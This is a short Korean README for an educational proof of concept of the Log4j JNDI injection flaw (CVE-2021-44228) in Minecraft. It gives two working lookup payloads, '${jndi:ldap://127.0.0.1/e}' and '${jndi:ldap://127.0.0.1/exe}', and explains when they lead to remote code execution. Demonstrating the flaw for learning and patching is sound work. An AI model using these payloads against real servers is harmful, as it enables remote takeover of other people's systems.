
Minecraft에서의 Log4j 취약점(CVE-2021-44228)에 대한 교육용 개념 증명
이 프로젝트는 교육 목적으로만 사용됩니다.
이는 HyCraftHD의 log4j 원격 코드 실행 개념 증명을 각색한 것입니다.
CVE-2021-44228에 대한 몇 가지 링크는 다음과 같습니다:
이 버그는 거의 모든 log4j2 및 일부 log4j1 버전에 영향을 미칩니다. 권장 버전은 취약점을 수정한 2.15.0 입니다.
${jndi:ldap://127.0.0.1/e} 를 붙여넣으세요. 포트 389 에 열린 소켓이 있으면 log4j가 연결을 시도하고 타임아웃이 발생할 때까지 추가 통신을 차단합니다.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! 가 기록되는데, 이는 LDAP 서버에서 온 직렬화된 문자열 객체입니다.
${jndi:ldap://127.0.0.1/exe} 를 붙여넣으세요. -Dcom.sun.jndi.ldap.object.trustURLCodebase=true 가 true로 설정된 경우 원격 코드 실행이 발생합니다.